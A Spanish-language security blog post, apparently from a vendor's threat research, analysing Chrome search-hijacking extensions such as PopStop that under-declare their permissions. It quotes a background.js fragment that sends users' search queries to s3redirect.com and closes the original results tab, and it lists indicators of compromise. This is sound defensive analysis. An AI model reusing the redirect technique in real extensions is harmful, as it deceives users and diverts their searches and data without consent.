«Pero verifiqué los permisos antes de instalar este bloqueador de ventanas emergentes, no dijo nada acerca de cambiar mis búsquedas», responde mi padre después de que lo regaño por instalar otra extensión de Chrome para secuestrar búsquedas. Por supuesto, no son difíciles de eliminar, pero tener que hacerlo una y otra vez es una molestia. Esto es especialmente cierto porque puede ser difícil averiguar cuál de las extensiones de Chrome es la culpable si el navegador comienza a fallar.

¿Que pasó?

Recientemente, nos encontramos con una familia de secuestradores de búsquedas que engañan acerca de los permisos que van a usar en su solicitud de instalación. Esta extensión, llamada PopStop, afirma que solo puede leer su historial de navegación. Parece bastante inofensivo, ¿verdad?

Mensaje de instalación de PopStop

Se supone que el mensaje de instalación en la tienda web le brinda información precisa sobre los permisos que requiere la extensión que está a punto de instalar. Ya es un hábito que las extensiones del navegador solo soliciten los permisos necesarios para funcionar correctamente desde el principio y luego soliciten permisos adicionales después de la instalación. ¿Por qué? Es más probable que los usuarios confíen en una extensión con advertencias limitadas o cuando se les explican los permisos.

Pero, ¿de qué sirven estas indicaciones informativas si solo te dan la mitad de la historia? En este caso, la extensión PopStop no solo lee su historial de navegación, como explica la ventana emergente, sino que también secuestra sus resultados de búsqueda.

Algunas de estas extensiones son más sencillas una vez que el usuario las instala y se enumeran debajo de las extensiones instaladas.

Extensión de la aplicación Niux

Pero otros son consistentes en sus mentiras incluso después de haber sido instalados, lo que hace que sea aún más difícil descubrir cuál es el responsable del secuestro de búsqueda.

Extensión PopStop

¿Cómo es esto posible?

Google había decidido en algún momento prohibir las extensiones que ofuscan su código. Al hacerlo, es más fácil para ellos leer la programación del complemento y realizar el análisis adecuado.

El primer paso para determinar qué está haciendo una extensión es mirar el archivo manifest.json.

manifest.json

El registro de un script en el manifiesto le dice a la extensión a qué archivo hacer referencia y, opcionalmente, cómo debe comportarse ese archivo.

Lo que este manifiesto nos dice es que el único script activo es «background.js» y los permisos declarados son «pestañas» y «almacenamiento». Más sobre esos permisos más adelante.

Las partes relevantes en background.js son estas piezas, porque nos muestran hacia dónde van nuestras búsquedas:

const BASE_DOMAIN = 's3redirect.com', pid = 9126, ver = 401;
chrome.tabs.create({url: `https://${BASE_DOMAIN}/chrome3.php?q=${searchQuery}`});
        setTimeout(() => {
          chrome.tabs.remove(currentTabId);
        }, 10);

Este script usa dos métodos chrome.tabs: uno para crear una nueva pestaña basada en su consulta de búsqueda y el otro para cerrar la pestaña actual. La pestaña cerrada habría mostrado los resultados de búsqueda de su proveedor de búsqueda predeterminado.

Mirando la API chrome.tabs , leemos:

“Puede utilizar la mayoría de los métodos y eventos de chrome.tabs sin declarar ningún permiso en el archivo de manifiesto de la extensión. Sin embargo, si necesita acceso a las propiedades url, pendienteUrl, título o favIconUrl de tabs.Tab, debe declarar el permiso «tabs» en el manifiesto «.

Y efectivamente, en el manifiesto de esta extensión encontramos:

"permissions": [ "tabs", "storage" ],

El permiso de «almacenamiento» no invoca un mensaje en la pantalla de advertencia que ven los usuarios cuando instalan una extensión. El permiso «pestañas» es el motivo del mensaje «Leer su historial de navegación». Aunque la API chrome.tabs se puede utilizar por diferentes motivos, también se puede utilizar para ver la URL asociada con cada pestaña recién abierta.

Las extensiones que encontramos lograron evitar tener que mostrar el mensaje “Leer y cambiar todos tus datos en los sitios web que visitas” que estaría asociado con el método “tabCapture”. Lo hicieron cerrando la pestaña actual después de capturar su término de búsqueda y abriendo una nueva pestaña para realizar la búsqueda de ese término en su propio sitio.

Las advertencias de permisos «normales» para un secuestrador de búsquedas se parecerían más a esto:

El efecto final es el mismo, pero es menos probable que un usuario experimentado instale esta última extensión, ya que se opondría a la solicitud de permiso o reconocería el complemento como un secuestrador de búsquedas al mirar estos mensajes.

¿Estas extensiones realmente mienten?

Algunos podrían llamarlo mentira. Algunos pueden decir que no, simplemente no ofrecieron toda la verdad. Sin embargo, el objetivo de esas ventanas emergentes de permisos es darles a los usuarios la opción de descargar un programa siendo sincero sobre lo que el programa les pide a sus usuarios.

En el caso de estas extensiones de Chrome, digamos que no están revelando el alcance total de las consecuencias de instalar sus extensiones.

Sería conveniente que Google agregara un posible mensaje para las extensiones que usan el método chrome.tabs.create. Esto informaría al usuario que su extensión podrá abrir nuevas pestañas, que es una forma de mostrar anuncios para que los usuarios conozcan esta posibilidad. Y chrome.tabs.create también resulta ser el método que utiliza esta extensión para reemplazar los resultados de búsqueda que buscábamos por los suyos.

Una ventaja adicional de estas extensiones es el hecho de que no se mencionan en el menú de configuración como lo haría un secuestrador de búsqueda «normal».

Un secuestrador de búsquedas que reemplace su motor de búsqueda predeterminado aparecerá en Configuración> Motor de búsqueda

No aparecer en la lista como el reemplazo del motor de búsqueda, nuevamente, hace que sea más difícil para un usuario descubrir qué extensión podría ser responsable de los resultados de búsqueda inesperados.

Por el momento, estos secuestradores pueden ser reconocidos por el nuevo encabezado que agregan a sus resultados de búsqueda, que se ve así:

Esto probablemente cambiará una vez que sus dominios actuales estén marcados como páginas de destino para secuestradores y se crearán nuevas extensiones utilizando otras páginas de destino.

Más detalles

Estas extensiones interceptan resultados de búsqueda de estos dominios:

  • aliexpress.com
  • booking.com
  • todos los dominios de google
  • ask.com
  • ecosia.org
  • bing.com
  • yahoo.com
  • mysearch.com
  • duckduckgo.com

También intercepta todas las consultas que contienen la cadena «spalp2020». Probablemente esto se deba a que esa cadena es un factor común en las URL del instalador que pertenecen a la familia de secuestradores powerapp.download .

Buscar secuestradores

Hemos escrito antes sobre los intereses de los desarrolladores turbios en la industria de las búsquedas de miles de millones de dólares y hemos informado sobre las diferentes tácticas a las que recurren estos desarrolladores para que los usuarios instalen sus extensiones o usen sus sitios de búsqueda [ 1 ], [ 2 ], [ 3 ].

Si bien esta familia no utiliza las prácticas de marketing más engañosas que existen, aún oculta su mal comportamiento a la vista. Muchos usuarios han aprendido a leer detenidamente los mensajes de solicitud de instalación para determinar si una extensión es segura. Es decepcionante que los desarrolladores puedan evadir dar información honesta y que estas extensiones se introduzcan en la tienda web una y otra vez.

COI

identificadores de extensión:

pcocncapgaibfcjmkkalopefmmceflnh

dpnebmclcgcbggnhicpocghdhjmdgklf

dominios de búsqueda:

s3redirect.com

s3arch.page

gooogle.page <= tenga en cuenta la «o» adicional

Malwarebytes detecta estas extensiones con el nombre de detección PUP.Optional.SearchEngineHijack.Generic .